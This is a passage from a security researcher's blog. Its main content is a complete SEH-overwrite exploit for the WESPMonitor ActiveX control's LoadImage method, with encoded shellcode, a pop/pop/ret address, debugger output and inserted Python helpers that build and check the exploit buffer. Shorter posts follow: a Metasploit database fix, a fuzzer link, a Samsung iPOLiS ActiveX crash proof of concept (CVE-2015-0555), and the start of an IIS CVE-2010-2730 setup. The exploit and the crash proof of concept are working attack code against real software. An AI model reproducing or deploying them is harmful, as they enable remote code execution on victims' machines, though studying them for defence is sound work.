0x10079740 changes to 0x10073f40<br />
0x100580bd changes to 0x10053fbd<br />
0x1007973e changes to 0x10073f3e<br />
0x7c915242 changes to 0x7c3f5242 in ntdll<br />
<br />
After some trial and error, found the addresses below, which don't have the problem mentioned above; it might be due to the bad-character issue where the application treats \x80 to \x9f as bad!<br />
0x1001a561<br />
0x10014771<br />
Bad characters might cause issues while executing shellcode; those characters can be found using the technique below.<br />
<a href="http://blog.disects.com/2014/04/exploitation-identifying-bad-characters.html">http://blog.disects.com/2014/04/exploitation-identifying-bad-characters.html</a><br />
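The pattern in the mangled addresses (0x97 becoming 0x3f, 0x80 becoming 0x3f, 0x91 becoming 0x3f) is what a wide-to-ANSI string conversion produces: the crash is in msvcrt!__wcstombs_mt, and JavaScript characters \x80 to \x9f are the C1 controls U+0080 to U+009F, which have no byte in the Windows-1252 code page, so the converter substitutes '?' (0x3f). The Python below is an added example for this post, not the author's code; it assumes the control converts its BSTR argument with the cp1252 code page and reproduces the address changes listed above. Windows' own cp1252 table round-trips the five bytes the code page leaves undefined (0x81, 0x8d, 0x8f, 0x90, 0x9d), which is consistent with their absence from the bad-character list in the exploit comment, whereas Python's codec replaces them as well.

```python
"""Model the wide-char to ANSI (cp1252) conversion that explains why
0x80-0x9f are bad characters and why pop/pop/ret addresses containing
such a byte arrive with that byte replaced by 0x3f ('?').

Added example for this post, not the author's or vendor's code. The
assumption that the conversion uses cp1252 is inferred from the crash
location (msvcrt!__wcstombs_mt) and the observed address changes.
"""
import struct

# Bad characters as listed in the exploit comment on this page.
AUTHOR_BAD_CHARS = (
    [0x80] + list(range(0x82, 0x8A)) + [0x8A, 0x8B, 0x8C, 0x8E]
    + list(range(0x91, 0x9A)) + [0x9A, 0x9B, 0x9C, 0x9E, 0x9F]
)


def ansi_convert(js_chars: str) -> bytes:
    """Model wcstombs(): encode the UTF-16 string to cp1252, substituting '?'
    for characters the code page cannot represent (what WideCharToMultiByte
    does by default)."""
    return js_chars.encode("cp1252", errors="replace")


def as_received(addr: int) -> int:
    """Return the 32-bit little-endian address as the control sees it after
    the JavaScript string "\\xNN\\xNN\\xNN\\xNN" has been converted."""
    js = "".join(chr(b) for b in struct.pack("<I", addr))
    return struct.unpack("<I", ansi_convert(js))[0]


def surviving_bytes() -> set:
    """Byte values that come through the conversion unchanged."""
    return {b for b in range(256) if ansi_convert(chr(b)) == bytes([b])}


def mangled_bytes() -> set:
    """Byte values the conversion replaces, i.e. the bad characters."""
    return set(range(256)) - surviving_bytes()


if __name__ == "__main__":
    for addr in (0x10079740, 0x100580BD, 0x1007973E, 0x7C915242, 0x1001A561):
        print(f"0x{addr:08x} -> 0x{as_received(addr):08x}")
    print("mangled:", sorted(hex(b) for b in mangled_bytes()))
```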
<br />
<span style="color: #cc0000;">>u 10079740 </span><br />
10079740 5e pop esi<br />
10079741 32c0 xor al,al<br />
10079743 5b pop ebx<br />
10079744 c3 ret<br />
<br />
Final Exploit<br />
<br />
<pre class="prettyprint"><html>
<!--
targetFile = "C:\Windows\System32\WESPSDK\WESPMonitor.dll"
prototype = "Sub LoadImage ( ByVal bstrFullPath As String )"
memberName = "LoadImage"
progid = "WESPMONITORLib.WESPMonitorCtrl"
argCount = 1
-->
<object classid='clsid:B19147A0-C2FD-4B1F-BD20-3A3E1ABC4FC3' id='target'>
</object>
<script>
var arg1 = "";
nops = "";
var buff = "";
for(i=0;i<268;i++)
{
    arg1 += "B";
}
nseh = "\xeb\x10\x90\x90";    //jmp over addr
seh = "\x71\x47\x01\x10";    //pop pop ret addr
document.write("</br>"+"Lengths: arg1="+arg1.length+" seh="+seh.length+"</br>");
for(i=0;i<200;i++)
{
    nops += "\x90";
}
//bad chars = 80,82-89, 8a 8b 8c, 8e, 91-99, 9a 9b 9c 9e 9f
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for(i=0;i<(4000-(arg1.length + seh.length + nseh.length + nops.length+ sc.length));i++)
{
    buff += "A";
}
//    [ Junk buffer (268) ][ next SEH (4) ][ SE Handler (4) ][ NOP sled (200) ][ Shellcode ][ 'A' filler up to 4000 ]
fbuff = arg1 + nseh + seh + nops + sc + buff;
target.LoadImage(fbuff);
</script>
</html>
</pre>
<div>
<br /></div>
Below is the WinDbg output at the first-chance exception: the byte copy at 1004ae5b (mov byte ptr [edx],al) has already run over the SEH record at 020ff274 and faults when it reaches 0x02100000, the end of the stack region.<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">(33c.6d8): Access violation - code c0000005 (first chance)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">First chance exceptions are reported before any exception handling.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">This exception may be expected and handled.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">eax=00000f41 ebx=001b012c ecx=020fe0b1 edx=02100000 esi=020fd218 edi=00001f42</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">eip=1004ae5b esp=020fd218 ebp=020ff280 iopl=0 nv up ei pl nz na pe nc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">*** WARNING: Unable to verify checksum for C:\WINDOWS\System32\WESPSDK\WESPMonitor.dll</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\System32\WESPSDK\WESPMonitor.dll - </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">WESPMonitor!DllUnregisterServer+0x2094b:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1004ae5b 8802 mov byte ptr [edx],al ds:0023:02100000=4d</span><br />
<span style="color: #cc0000;">0:008> !exchain</span><br />
020ff274: WESPMonitor!CAudioRenderer::CloseAudio+11a61 (<b><span style="color: #c27ba0;">10014771</span></b>)<br />
Invalid exception stack at 909010eb<br />
<span style="color: #cc0000;">0:008> d fs:[0]</span><br />
003b:00000000 <b><span style="color: #073763;">74 f2 0f 02</span></b> 00 00 10 02-00 00 0f 02 00 00 00 00 t...............<br />
003b:00000010 00 1e 00 00 00 00 00 00-00 50 fd 7f 00 00 00 00 .........P......<br />
003b:00000020 3c 03 00 00 d8 06 00 00-00 00 00 00 00 00 00 00 <...............<br />
003b:00000030 00 e0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
003b:00000040 70 98 8e e1 00 00 00 00-00 00 00 00 00 00 00 00 p...............<br />
003b:00000050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
003b:00000060 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
003b:00000070 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
<span style="color: #cc0000;">0:008> u 10014771</span><br />
WESPMonitor!CAudioRenderer::CloseAudio+0x11a61:<br />
<b><span style="color: #c27ba0;">10014771</span></b> 5b pop ebx<br />
10014772 5d pop ebp<br />
10014773 c3 ret<br />
<span style="color: #cc0000;">0:008> d 020ff274</span><br />
<span style="color: #0c343d;"><b>020ff274</b> </span> eb 10 90 90 <b><span style="color: #c27ba0;">71 47 01 10</span></b>-90 90 90 90 90 90 90 90 ....qG..........<br />
020ff284 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020ff294 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020ff2a4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020ff2b4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020ff2c4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020ff2d4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020ff2e4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
<br />
If we continue execution past the first-chance exception, the dispatcher calls our handler at 10014771 (pop ebx / pop ebp / ret), which returns into the nSEH bytes eb 10 (jmp short +0x10); that jump lands in the NOP sled, the shellcode runs, and we are greeted with a calculator :-)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZLH260gcxkqDSk9nzrmH4orB21AZsxzLCYV6sv8O8iJnECwakKpt1TfX2947F7SmUZPWmv8UJd6fsGlvzHsdP2PRLkRjpWhFcRzWKEmZn-lso7NoQZffCUONJURV3Dddg54OYgTXeI23Q/s1600/shellcode_calc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZLH260gcxkqDSk9nzrmH4orB21AZsxzLCYV6sv8O8iJnECwakKpt1TfX2947F7SmUZPWmv8UJd6fsGlvzHsdP2PRLkRjpWhFcRzWKEmZn-lso7NoQZffCUONJURV3Dddg54OYgTXeI23Q/s1600/shellcode_calc.png" height="192" width="400" /></a></div>
<br />
This exploit was tested on Windows XP SP3 with IE6, IE7 and IE8.<br />
It was tested and executed successfully with DEP enabled.<br />
<br />
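The layout comment in the exploit and the bad-character list are the two things worth checking mechanically before loading the page in the browser. The Python below is an added example, not the exploit author's code: it rebuilds the same 4000-byte buffer from the values on this page, verifies that the bytes in the nSEH slot are a short jump that lands inside the NOP sled, and scans a payload for the listed bad bytes. SAMPLE_SC is a constructed stand-in (the first bytes of the page's encoded shellcode plus filler); substitute the real payload before relying on the result.

```python
import struct

# Bad bytes listed in the exploit comment above (80, 82-8c, 8e, 91-9c, 9e, 9f).
BAD_CHARS = frozenset([0x80, 0x8E, 0x9E, 0x9F]
                      + list(range(0x82, 0x8D)) + list(range(0x91, 0x9D)))

# Values from the page: 268 bytes to the SEH record, jmp short +0x10 as nSEH,
# pop/pop/ret at 0x10014771 in WESPMonitor.dll, 200-byte NOP sled, 4000 bytes total.
OFFSET, NSEH, SEH_ADDR, NOP_LEN, TOTAL = 268, b"\xeb\x10\x90\x90", 0x10014771, 200, 4000

# Constructed stand-in for the payload: the first bytes of the page's shellcode
# followed by filler. Replace with the real encoded shellcode before use.
SAMPLE_SC = b"\x54\x5d\xda\xc9\xd9\x75\xf4\x59" + b"\x49" * 5 + b"\x43" * 6


def find_bad_chars(payload, bad=BAD_CHARS):
    """Return [(offset, byte)] for every byte of payload that is in the bad set."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def build_seh_buffer(offset, nseh, seh_addr, shellcode, total=TOTAL, nop_len=NOP_LEN):
    """[ junk ][ nSEH ][ SEH ][ NOP sled ][ shellcode ][ filler ], padded to `total`.

    Same layout the JavaScript above builds; the handler address is packed
    little-endian (0x10014771 -> 71 47 01 10) instead of being hand-typed.
    """
    core = (b"B" * offset + nseh + struct.pack("<I", seh_addr)
            + b"\x90" * nop_len + shellcode)
    if len(core) > total:
        raise ValueError("payload of %d bytes does not fit in %d" % (len(core), total))
    return core + b"A" * (total - len(core))


def short_jmp_target(buf, at):
    """Offset reached by the 2-byte short JMP (EB rel8) at `at`; rel8 is signed."""
    if buf[at] != 0xEB:
        raise ValueError("no short jmp at offset %d" % at)
    rel = buf[at + 1]
    if rel >= 0x80:
        rel -= 0x100
    return at + 2 + rel          # displacement is relative to the next instruction


def check_layout(buf, offset=OFFSET, nop_len=NOP_LEN):
    """Checks to run before loading the page: the jump in nSEH lands inside the
    NOP sled, and the 8-byte SEH record itself contains no bad byte."""
    sled_start = offset + 8                     # after nSEH (4) and SEH (4)
    target = short_jmp_target(buf, offset)
    return {
        "jmp_target": target,
        "lands_in_sled": sled_start <= target < sled_start + nop_len,
        "bad_in_seh_record": find_bad_chars(buf[offset:offset + 8]),
    }


if __name__ == "__main__":
    buf = build_seh_buffer(OFFSET, NSEH, SEH_ADDR, SAMPLE_SC)
    print("buffer length:", len(buf))
    print("layout:", check_layout(buf))
    print("bad bytes in payload:", find_bad_chars(SAMPLE_SC))
```

The bad list is worth understanding rather than memorising: it is exactly the set of bytes in 0x80-0x9F that Windows-1252 assigns to other Unicode characters (0x80 is U+20AC, for instance). A JavaScript "\x80" is U+0080, which has no Windows-1252 byte, so it is mangled when the BSTR is converted to ANSI on its way into the control, while the five slots the code page leaves undefined (81, 8D, 8F, 90, 9D) survive the round trip.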
This post is incomplete if I don't thank Peter Van Eeckhoutte aka corelanc0d3r.<br />
<br />
Next, DEP bypass!!<br />
<br />Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-67002258123167022022015-03-25T00:24:00.000+05:302015-03-25T00:24:19.765+05:30Metasploit: Database not connected or cache not built, using slow searchWe can search Metasploit modules with the search command and its various options, but we frequently come across the error "Database not connected or cache not built, using slow search". Follow the steps below to solve the issue.<br />
<br />
<span style="color: #cc0000;">msf > search cve:2015-0255</span> <br />
[!] Database not connected or cache not built, using slow search<br />
<br />
PostgreSQL service status when it is not running (no cluster listed):<br />
<span style="color: #cc0000;">root@kali-praveend:/# service postgresql status</span><br />
Running clusters:<br />
<br />
<span style="color: #cc0000;">root@kali-praveend:/# service metasploit status</span><br />
[FAIL] Metasploit rpc server is not running ... failed!<br />
[FAIL] Metasploit web server is not running ... failed!<br />
[FAIL] Metasploit worker is not running ... failed!<br />
<span style="color: #cc0000;"><br /></span>
<span style="color: #cc0000;">root@kali-praveend:/# service metasploit start </span> <br />
[FAIL] Postgresql must be started before Metasploit ... failed!<br />
<br />
<span style="color: #cc0000;">root@kali-praveend:/# service postgresql start </span> <br />
[ ok ] Starting PostgreSQL 9.1 database server: main.<br />
<br />
<span style="color: #cc0000;">root@kali-praveend:/# service postgresql status</span><br />
Running clusters: 9.1/main<br />
<br />
<span style="color: #cc0000;">root@kali-praveend:/# service metasploit start</span><br />
[ ok ] Starting Metasploit rpc server: prosvc.<br />
[ ok ] Starting Metasploit web server: thin.<br />
[ ok ] Starting Metasploit worker: worker.<br />
<br />
<span style="color: #cc0000;">msf > db_status </span> <br />
[*] postgresql connected to msf3<br />
<br />
<span style="color: #cc0000;">msf > db_rebuild_cache </span> <br />
[*] Purging and rebuilding the module cache in the background...<br />
msf ><br />
<br />
Now we should not see the error.Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-45453497694720810872015-03-06T23:55:00.000+05:302015-03-10T21:28:48.902+05:30Web Server/HTTP FuzzerI was searching for a basic HTTP/web server fuzzer but could not find one.<br />
So I ended up writing this quick and dirty fuzzer.<br />
<br />
<b>Features</b><br />
<br />
Supports 40 different Request Methods<br />
Supports around 40 Request Headers<br />
Can send invalid request methods and headers<br />
Fuzz Methods and Headers<br />
Fuzz Headers with XSS String(s), blank strings, huge buffer<br />
<br />
<a href="https://github.com/praveendhac/VulnerabilityResearch/blob/master/WebServer_Fuzzer.py">https://github.com/praveendhac/VulnerabilityResearch/blob/master/WebServer_Fuzzer.py</a><br />
<br />
Please drop comments if you want me to add new feature(s).Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com2tag:blogger.com,1999:blog-1852980805947568568.post-36890894218295865172015-02-28T01:35:00.002+05:302015-03-26T00:07:27.264+05:30Samsung iPOLiS 1.12.2 XnsSdkDeviceIpInstaller ActiveX ReadConfigValue Remote Code Execution PoC<b>Author:</b> Praveen Darshanam<br />
<b>CVE:</b> 2015-0555<br />
<b>Vulnerable File:</b> "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"<br />
<b>prototype:</b> "Function ReadConfigValue ( ByVal szKey As String ) As String"<br />
<b>memberName:</b> "ReadConfigValue"<br />
<b>progid/ActiveX:</b> "XNSSDKDEVICELib.XnsSdkDevice"<br />
<b>Operating System:</b> Windows 7 Ultimate N SP1<br />
<b>Vulnerable Software:</b> Samsung iPOLiS 1.12.2<br />
<br />
<b>Proof of Concept</b><br />
<pre class="prettyprint">
<html>
<head><title>Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX ReadConfigValue Remote Code Execution PoC</title></head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>
var argCount = 1;            // ReadConfigValue takes a single String argument (szKey)
var arg1 = "";
for (i = 0; i <= 4000; i++)  // 4001 bytes of 'A' (0x41)
{
    arg1 += "A";
}
target.ReadConfigValue(arg1);
</script>
</html>
</pre>
<b>Stack Trace</b><br />
Exception Code: ACCESS_VIOLATION<br />
Disasm: 6492CE<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV AL,[EDI+EDX]<br />
<br />
Seh Chain:<br />
--------------------------------------------------<br />
1 <span class="Apple-tab-span" style="white-space: pre;"> </span>41414141<br />
<br />
Called From Returns To<br />
--------------------------------------------------<br />
XNSSDKDEVICE.6492CE 41414141<br />
41414141 8ABAB41<br />
8ABAB41 mfc100.64BA90C1<br />
mfc100.64BA90C1 3D39D016<br />
FFFFFFFE mfc100.64AFBE5C<br />
<br />
Registers:<br />
--------------------------------------------------<br />
EIP 006492CE<br />
EAX 00000408<br />
EBX 01AD9FB0 -> 0065A564<br />
ECX 00000414<br />
EDX 08ABAB41<br />
EDI 0000009C<br />
ESI 0000009C<br />
EBP 002DEA9C -> Asc: AAAAAAAAA<br />
ESP 002DE7F4 -> 59D56B19 -> Asc: k k<br />
<br />
Block Disassembly:<br />
--------------------------------------------------<br />
6492BD<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV ECX,EAX<br />
6492BF<span class="Apple-tab-span" style="white-space: pre;"> </span>XOR ESI,ESI<br />
6492C1<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV [EBP-298],ECX<br />
6492C7<span class="Apple-tab-span" style="white-space: pre;"> </span>TEST ECX,ECX<br />
6492C9<span class="Apple-tab-span" style="white-space: pre;"> </span>JLE SHORT 00649340<br />
6492CB<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV EDX,[EBP+8]<br />
6492CE<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV AL,[EDI+EDX]<span class="Apple-tab-span" style="white-space: pre;"> </span>&lt;--- crash<br />
6492D1<span class="Apple-tab-span" style="white-space: pre;"> </span>CMP AL,2F<br />
6492D3<span class="Apple-tab-span" style="white-space: pre;"> </span>JNZ SHORT 00649333<br />
6492D5<span class="Apple-tab-span" style="white-space: pre;"> </span>TEST EDI,EDI<br />
6492D7<span class="Apple-tab-span" style="white-space: pre;"> </span>JNZ SHORT 00649304<br />
6492D9<span class="Apple-tab-span" style="white-space: pre;"> </span>PUSH 80<br />
6492DE<span class="Apple-tab-span" style="white-space: pre;"> </span>LEA EAX,[EBP-90]<br />
6492E4<span class="Apple-tab-span" style="white-space: pre;"> </span>PUSH EDI<br />
6492E5<span class="Apple-tab-span" style="white-space: pre;"> </span>PUSH EAX<br />
<br />
ArgDump:<br />
--------------------------------------------------<br />
EBP+8<span class="Apple-tab-span" style="white-space: pre;"> </span>08ABAB41<br />
EBP+12<span class="Apple-tab-span" style="white-space: pre;"> </span>64BA90C1 -> EBE84589<br />
EBP+16<span class="Apple-tab-span" style="white-space: pre;"> </span>3D39D016<br />
EBP+20<span class="Apple-tab-span" style="white-space: pre;"> </span>FFFFFFFE<br />
EBP+24<span class="Apple-tab-span" style="white-space: pre;"> </span>64AFBE5C -> CCCCCCC3<br />
EBP+28<span class="Apple-tab-span" style="white-space: pre;"> </span>00000018<br />
<br />
Stack Dump:<br />
--------------------------------------------------<br />
2DE7F4 19 6B D5 59 08 00 00 00 A0 EA 2D 00 10 92 64 00 [.k.Y..........d.]<br />
2DE804 14 04 00 00 64 65 C4 64 00 00 00 00 00 00 00 00 [....de.d........]<br />
2DE814 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]<br />
2DE824 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]<br />
2DE834 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]<br />
<br />
Exception Code: ACCESS_VIOLATION<br />
Disasm: 41414141<span class="Apple-tab-span" style="white-space: pre;"> </span>?????<br />
<br />
Seh Chain:<br />
--------------------------------------------------<br />
1 <span class="Apple-tab-span" style="white-space: pre;"> </span>41414141<br />
<br />
Called From Returns To<br />
--------------------------------------------------<br />
ntdll.77B670B4 ntdll.77BDAB1A<br />
ntdll.77BDAB1A ntdll.77BB0404<br />
ntdll.77BB0404 ntdll.77B3F956<br />
ntdll.77B3F956 ntdll.77B67017<br />
ntdll.77B67017 41414141<br />
41414141 8ABAB41<br />
8ABAB41 mfc100.64BA90C1<br />
mfc100.64BA90C1 3D39D016<br />
FFFFFFFE mfc100.64AFBE5C<br />
<br />
Registers:<br />
--------------------------------------------------<br />
EIP 77B670B4 -> C0000005<br />
EAX 002DE0EC -> C0000005<br />
EBX 41414141<br />
ECX 41414141<br />
EDX 00000000<br />
EDI 00000000<br />
ESI 002DE0EC -> C0000005<br />
EBP 002DE0D8 -> 002DE40C<br />
ESP 002DE088 -> 77B662A4<br />
<br />
<br />
Block Disassembly:<br />
--------------------------------------------------<br />
77B6709C<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV [ESP+8],EBX<br />
77B670A0<span class="Apple-tab-span" style="white-space: pre;"> </span>JMP 77B837AD<br />
77B670A5<span class="Apple-tab-span" style="white-space: pre;"> </span>LEA ESP,[ESP]<br />
77B670AC<span class="Apple-tab-span" style="white-space: pre;"> </span>LEA ESP,[ESP]<br />
77B670B0<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV EDX,ESP<br />
77B670B2<span class="Apple-tab-span" style="white-space: pre;"> </span>SYSENTER<br />
77B670B4<span class="Apple-tab-span" style="white-space: pre;"> </span>RETN<span class="Apple-tab-span" style="white-space: pre;"> </span>&lt;--- crash<br />
77B670B5<span class="Apple-tab-span" style="white-space: pre;"> </span>LEA ESP,[ESP]<br />
77B670BC<span class="Apple-tab-span" style="white-space: pre;"> </span>LEA ESP,[ESP]<br />
77B670C0<span class="Apple-tab-span" style="white-space: pre;"> </span>LEA EDX,[ESP+8]<br />
77B670C4<span class="Apple-tab-span" style="white-space: pre;"> </span>INT 2E<br />
77B670C6<span class="Apple-tab-span" style="white-space: pre;"> </span>RETN<br />
77B670C7<span class="Apple-tab-span" style="white-space: pre;"> </span>NOP<br />
77B670C8<span class="Apple-tab-span" style="white-space: pre;"> </span>PUSH EBP<br />
77B670C9<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV EBP,ESP<br />
<br />
<br />
ArgDump:<br />
--------------------------------------------------<br />
EBP+8<span class="Apple-tab-span" style="white-space: pre;"> </span>002DE0EC -> C0000005<br />
EBP+12<span class="Apple-tab-span" style="white-space: pre;"> </span>002DE13C -> 00000000<br />
EBP+16<span class="Apple-tab-span" style="white-space: pre;"> </span>00000000<br />
EBP+20<span class="Apple-tab-span" style="white-space: pre;"> </span>C0000005<br />
EBP+24<span class="Apple-tab-span" style="white-space: pre;"> </span>00000001<br />
EBP+28<span class="Apple-tab-span" style="white-space: pre;"> </span>00000000<br />
<br />
P.S. CERT tried to coordinate, but there wasn't any response from Samsung.Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-3160153049125010392015-02-28T01:33:00.000+05:302015-03-02T23:15:05.151+05:30CVE-2010-2730: Microsoft IIS Request Header Buffer Overflow Vulnerability Writing a proof of concept based on the information available on various sites.<br />
Check Point describes the vulnerability as follows:<br />
<br />
<i>"The vulnerability is due to a heap buffer overflow error when processing unexpected number of headers in an HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to a target server. Successful exploitation would allow an attacker to inject and execute arbitrary code on the target system with the security privileges of the IIS Worker process."</i><br />
<br />
<b>Configuring FastCGI for IIS 7.5</b><br />
Browse to<br />
<span style="font-family: Courier New, Courier, monospace;">Control Panel -> Programs and Features </span><br />
click "Turn Windows features on or off" and follow the path shown below.<br />
Note: I also tried enabling only CGI and unchecking all the other checkboxes shown below.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw_ozahZfsphmmnoK23WrPWBJykIteopjWKODcJLtOnRf4ww4Z8-jkCZlBerAr-GHsSBo7s7k4t7csejpctrCPw-77WDC_9_ZUI9wCQPef7SdaS9K4A4KwvpzNaycP9gp09egams-fSt5A/s1600/enable_cgi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw_ozahZfsphmmnoK23WrPWBJykIteopjWKODcJLtOnRf4ww4Z8-jkCZlBerAr-GHsSBo7s7k4t7csejpctrCPw-77WDC_9_ZUI9wCQPef7SdaS9K4A4KwvpzNaycP9gp09egams-fSt5A/s1600/enable_cgi.png" height="400" width="310" /></a></div>
<br />
<br />
Install the Administration Pack for IIS 7.5. After installing it, click Start and type IIS; you will see Internet Information Services (IIS) Manager, and clicking on it will take you to the window below.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh28w-VPJjqC0e672rQz4CN0S9yw4ADEMK2TLkS8cL0jww7ozIHC8dp8jITKpldmlVcGz8tHTOAqk5UBe-jMmZC_NDUV7Mjd6Josc0FyRWwmcxwaG_-ELU5d63B0iUyEpSYP-UdHh-adNAb/s1600/AdministrationPackforIIS7_RemoteAdministration.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh28w-VPJjqC0e672rQz4CN0S9yw4ADEMK2TLkS8cL0jww7ozIHC8dp8jITKpldmlVcGz8tHTOAqk5UBe-jMmZC_NDUV7Mjd6Josc0FyRWwmcxwaG_-ELU5d63B0iUyEpSYP-UdHh-adNAb/s1600/AdministrationPackforIIS7_RemoteAdministration.png" height="332" width="400" /></a></div>
<br />
Configure FastCGI as shown below<br />
<div class="separator" style="clear: both; text-align: center;">
